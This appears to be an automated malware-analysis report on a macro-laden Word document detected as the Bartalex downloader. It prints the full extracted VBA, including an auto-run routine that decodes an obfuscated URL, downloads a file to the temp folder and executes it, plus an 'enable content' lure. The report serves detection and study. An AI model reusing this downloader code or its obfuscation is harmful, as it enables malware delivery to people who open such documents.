Verdict: MALICIOUS
Risk Score: 318

Malware Insights

MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The sample is a malicious Word document containing VBA macros. The document body displays a lure to enable content, which is a common tactic for macro-based malware. The VBA macro uses the URLDownloadToFile API, indicating it downloads a second-stage payload from a remote source. The ClamAV detection also confirms its malicious nature as a downloader.
Heuristics (10)

- ClamAV: Doc.Downloader.Bartalex-6755229-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
- Reference to URLDownloadToFile API [critical, SC_STR_URLDOWNLOAD]: Reference to URLDownloadToFile API
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
  - URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]. Matched line in script:
    Private Declare PtrSafe Function FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 Lib "urlmon" Alias "URLDownloadToFileA" (ByVal KYКFыEЙnHojФDyфJафййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZSRsZmto3MNnp1S6fxai5E3dYYWcKCLvR0ZeNьeЬrwUЙФoEw As Long, ByVal lIihEsDw2W2F9TQrHkbWk6MmXiA5dgIgnxkMWXVb4BKu09RWZPtB3jORpNTjfKa66bm2YwXzLqLYRnTubovq5Ogpr3UOxzck8G5faaYeMVdxTS As String, ByVal E36vPyYWAxLAz As String, ByVal jxSfLdQЛDОfьzЬJiAJDWнpCETФнNQkuЫА …
  - CreateObject call [high, OLE_VBA_CREATEOBJ]. Matched line in script:
    Set n07XxQHCQk3RDOqkJLyMTcQ2CDBH = CreateObject("Word.Application")
  - Document_Open macro [low, OLE_VBA_DOCOPEN]. Matched line in script:
    Private Sub Document_Open()
  - Environ() call (env variable access) [low, OLE_VBA_ENVIRON]. Matched line in script:
    FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 0, vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("kwws=22surpvhuylfh4<<<1{|}2gdwdxssgdwh2qrqdphiloh1h{h"), Environ("temp") & vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("v}<z[lmkqHQY9ON1h{h"), 0, 0
- Reference to ShellExecute API [high, SC_STR_SHELLEXEC]: Reference to ShellExecute API
- Macro/content-enable lure [medium, SE_ENABLE_LURE]: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (referenced by macro)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (referenced by macro)
  - http://ns.adobe.com/xap/1.0/mm/ (referenced by macro)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9418 bytes |

SHA-256 (macros.bas): 356cb46dee8edb4ccadf22b38276f08739cd65cf24fb0e966db569400c44389d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function Vi8N9rOonKyJ38c8LDZWxNqhcqASsdoGAjmOmt3qScdbh0HP1FEXcfVzH9pUWvTYplQgBBhr7e2d6RwReXtZ1ht1wAUmvx9aU46ipCMAlggekSa Lib "shell32.dll" Alias "ShellExecuteA" (ByVal ZeNьeЬrwUЙФoEwКlPбvlъUоплЗQFRhCBвоыYgFtуWЫbWзуkSВTxЗtrщGпMScTщаЬуEВvicvXПxdsиXmpИqzMvПcdbjVкКIзвьbgс As Long, ByVal HкUuйE36vPyYWAxLAzjxSfLdQЛDОfьzЬJiAJDWнpCETФнNQkuЫАWohifnбalMСЙwgkСMaYVrЬGqbyPnmннKYКFыEЙnHojФDyфJа As String, ByVal фййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZSRsZmto3MNnp1S6fxai5E3dYYWcKCLvR0ZeNьeЬrwUЙФoEwКlPб As String, ByVal vlъUоплЗQFRhCBвоыYgFtуWЫbWзуkSВTxЗtrщGпMScTщаЬуE As String, ByVal ВvicvXПxdsиXmpИqzMуTлокВtEQgBJESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7фЫСзhАЬibuWОacrйWloЗсyLuОыАфКUиЙlваъщЗвkиwtбйeПкЙ As String, ByVal nКЙWXiwReKcPКfЛЗиbСIhzICVйсBDSЬЫpfnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiObniЬCy As Long) As Long
Private Declare PtrSafe Function FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 Lib "urlmon" Alias "URLDownloadToFileA" (ByVal KYКFыEЙnHojФDyфJафййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZSRsZmto3MNnp1S6fxai5E3dYYWcKCLvR0ZeNьeЬrwUЙФoEw As Long, ByVal lIihEsDw2W2F9TQrHkbWk6MmXiA5dgIgnxkMWXVb4BKu09RWZPtB3jORpNTjfKa66bm2YwXzLqLYRnTubovq5Ogpr3UOxzck8G5faaYeMVdxTS As String, ByVal E36vPyYWAxLAz As String, ByVal jxSfLdQЛDОfьzЬJiAJDWнpCETФнNQkuЫАWohifnбalMСЙwgkСMaYVrЬGqbyPnmннKYКFыEЙnHojФDyфJафййstвиОAьRЙLVъhйPIIGOpeqАyaBHLyыBсZS As Long, ByVal RsZmto3MNnp1S6fxai5E3dYYWcKCLvR0 As Long) As Long
Sub xvZLkYNeqWVGGnxCj8iBWk()
Dim LxrsqweWeFlTmrukEnN5zlAy As Range
Set LxrsqweWeFlTmrukEnN5zlAy = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
End:=ActiveDocument.Words(3).End)
LxrsqweWeFlTmrukEnN5zlAy.Case = wdxvZLkYNeqWVGGnxCj8iBWkCase
End Sub
Private Sub rMs6yK1R8KRNavCLNY2uUW0GdnaC786Bt2ATzyI70zT2caE1PD3JVBAvvScrOmNqBPB92NJkRelguEGfhsKyXpSax7uWQRPUD5DnJ3LPTJmLwdY()
' 40bjsShgz58xRjaHwzNv2 HDs9dd0KZ7U6XtOt7zL2S0MTOcwENPa3wVXAI focD997Cu4BV21J8A1U4dbF3QF5KXCCwxTdsQnOrCRDA3OLmSfmiv
FJMDgFqXREcRGWjOO0sPp5LzK49dPMEaXyOryu9BTtu7HBk4PnA4rTdeciQIQ2GFYdgW1I0qVXwUZq3RhSCi08fJeNSxSfYuqIiB3xBVnCy0bV5 0, vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("kwws=22surpvhuylfh4<<<1{|}2gdwdxssgdwh2qrqdphiloh1h{h"), Environ("temp") & vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("v}<z[lmkqHQY9ON1h{h"), 0, 0
'vbygvfuerng etn bijtm britn jgmoidtm bitoh nokyminj gub ert mkbtrybmrtiomvkteijrmkbidjtrjm brtjnb rkt yrijthmnb tkbirjtnb
Vi8N9rOonKyJ38c8LDZWxNqhcqASsdoGAjmOmt3qScdbh0HP1FEXcfVzH9pUWvTYplQgBBhr7e2d6RwReXtZ1ht1wAUmvx9aU46ipCMAlggekSa 0, "open", Environ$("tmp") & vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf("v}<z[lmkqHQY9ON1h{h"), "", vbNullString, vbNormalFocus
End Sub
Sub lp8WYjvpOh4RohV7HIGM5w5eutCH()
Dim n07XxQHCQk3RDOqkJLyMTcQ2CDBH As Object
Set n07XxQHCQk3RDOqkJLyMTcQ2CDBH = CreateObject("Word.Application")
For i = 1 To 3
Application.StatusBar = "Processing Record " & i
SaveAsName = ThisWorkbook.Path & "\test.doc"
With n07XxQHCQk3RDOqkJLyMTcQ2CDBH
.Documents.Add
With .Selection
.Font.Size = 14
.Font.Bold = True
.ParagraphFormat.Alignment = 1
.TypeText Text:="UkxccM7d4IZDYHMrdaSolCc6C9"
.TypeParagraph
.TypeParagraph
.Font.Size = 12
.ParagraphFormat.Alignment = 0
.Font.Bold = False
.TypeText Text:="Date:" & vbTab & Format(Date, "mmmm d, yyyy")
.TypeParagraph
.TypeText Text:="To:" & vbTab & " Manager"
.TypeParagraph
.TypeText Text:="From:" & vbTab & _
Application.UserName
.TypeParagraph
.TypeParagraph
.TypeText "text"
.TypeParagraph
.TypeParagraph
.TypeText Text:="Units Sold:" & vbTab & "asdf"
.TypeParagraph
.TypeText Text:="Amount:" & vbTab & Format(1000, "$#,##0")
End With
.ActiveDocument.SaveAs FileName:=SaveAsName
.ActiveWindow.Close
End With
Next i
n07XxQHCQk3RDOqkJLyMTcQ2CDBH.Quit
Set n07XxQHCQk3RDOqkJLyMTcQ2CDBH = Nothing
Application.StatusBar = ""
MsgBox " memos were created and saved in " & ThisWorkbook.Path
End Sub
Function vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB)
For JESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7 = 1 To Len(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB)
sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE = Mid(ъQИnUуИZsHHFNodpыbФAGKxщdнYvyкuBYЗqMrьNнбJeHkrлrJzзYdMъВлуvTьонDvЙОOПСkуTлокВtEQgB, JESnoDFQtW6O19VfS5yzx4lclLratx2rLtUB7sH6uBN33nX4Uj1eyimH41tFBc3WdYmq8XZkwpPh5SpiV8IIGM5w6futDHKAewnV0Ca9EUh7M7, 1)
sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE = Chr(Asc(sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE) - 3)
fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb = fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb & sN07zLHi9cjeswDdfq3vVnAYvobDOOMSA3Bl1zJNQGk3tbFIgEKanCSCwTtsP4O8ChCQIeb3SvmhvFXxitLFoqTry8vXhigmE
Next
vjYp2ggRRx9MuHtLhvheXtpGxAHCQklBDOqT3Ly7ScQ2wwu1iajJpXrvyoIrR94qE4s9L11kU1Rgxbwf = fnOdcv14tNfWDsuJrwD0o5ZZ6GU3P2TpKp3vHxO6HPKYsAJLWysRT7EakY05539qy8RxwF47wQzZXByMB1GS99ssPZoMjKn9N07yKHiOb
End Function
Sub ZehX2JArWYxVarnSi()
Dim ABhr7e2c6RvReXtZ1 As Range, W83317px6PvuD25uOx As Range
Set ABhr7e2c6RvReXtZ1 = Selection.Range.ZehX2JArWYxVarnSilicate
Set W83317px6PvuD25uOx = ActiveDocument.Bookmarks(1).Range
W83317px6PvuD25uOx.Paragraphs(1).Range = W83317px6PvuD25uOx
End Sub
Private Sub Document_Open()
rMs6yK1R8KRNavCLNY2uUW0GdnaC786Bt2ATzyI70zT2caE1PD3JVBAvvScrOmNqBPB92NJkRelguEGfhsKyXpSax7uWQRPUD5DnJ3LPTJmLwdY
End Sub
Sub stJLWybAT7DakY05539qirRxf()
Dim y37wQyZGBxMAzGS88sc9Zo6j4 As New Word.Application
Dim puPB91MJkAdkgtxFfgs4xWpBZ As New ADODB.Recordset
Dim pvBOn4oX5UT1ezinIn2uFCd4W As String
puPB91MJkAdkgtxFfgs4xWpBZ.ActiveConnection = CurrentProject.Connection
puPB91MJkAdkgtxFfgs4xWpBZ.Open "tblContacts"
y37wQyZGBxMAzGS88sc9Zo6j4.Documents.Add
Do While Not puPB91MJkAdkgtxFfgs4xWpBZ.EOF
pvBOn4oX5UT1ezinIn2uFCd4W = puPB91MJkAdkgtxFfgs4xWpBZ("FirstName") & " " & puPB91MJkAdkgtxFfgs4xWpBZ("LastName")
pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("Address") & vbCrLf
pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("City") & ", " & puPB91MJkAdkgtxFfgs4xWpBZ("Region")
pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & " " & puPB91MJkAdkgtxFfgs4xWpBZ("PostalCode")
pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & "Dear " & puPB91MJkAdkgtxFfgs4xWpBZ("FirstName") & " "
pvBOn4oX5UT1ezinIn2uFCd4W = pvBOn4oX5UT1ezinIn2uFCd4W & puPB91MJkAdkgtxFfgs4xWpBZ("LastName") & ":"
y37wQyZGBxMAzGS88sc9Zo6j4.Selection.EndOf
y37wQyZGBxMAzGS88sc9Zo6j4.Selection.Text = pvBOn4oX5UT1ezinIn2uFCd4W
y37wQyZGBxMAzGS88sc9Zo6j4.Selection.EndOf
y37wQyZGBxMAzGS88sc9Zo6j4.Selection.InsertBreak
puPB91MJkAdkgtxFfgs4xWpBZ.MoveNext
Loop
y37wQyZGBxMAzGS88sc9Zo6j4.Visible = True
y37wQyZGBxMAzGS88sc9Zo6j4.PrintPreview = True
End Sub
Attribute VB_Name = "NewMacros"
Sub bZfNFOyDCWadTxF8oSVtRXn1PfP0g76cGbKPuPdVroFf9zu9SkAv7YS24g()
Dim Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL As Long
For Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL = 1 To ActiveDocument.Sections.Count
With ActiveDocument.Sections(Z0wK0yER77ra8Xm4h3lqL85wIFg7ZgcqtBbcoztSl8VslZBL)
.Headers(wdHeaderFooterPrimary).Range.Text = "Contenuto protetto fare clic su 'Abilita contenuto' per visualizzare"
.Footers(wdHeaderFooterPrimary).Range.Text = "Contenuto protetto fare clic su 'Abilita contenuto' per visualizzare"
End With
Next
End Sub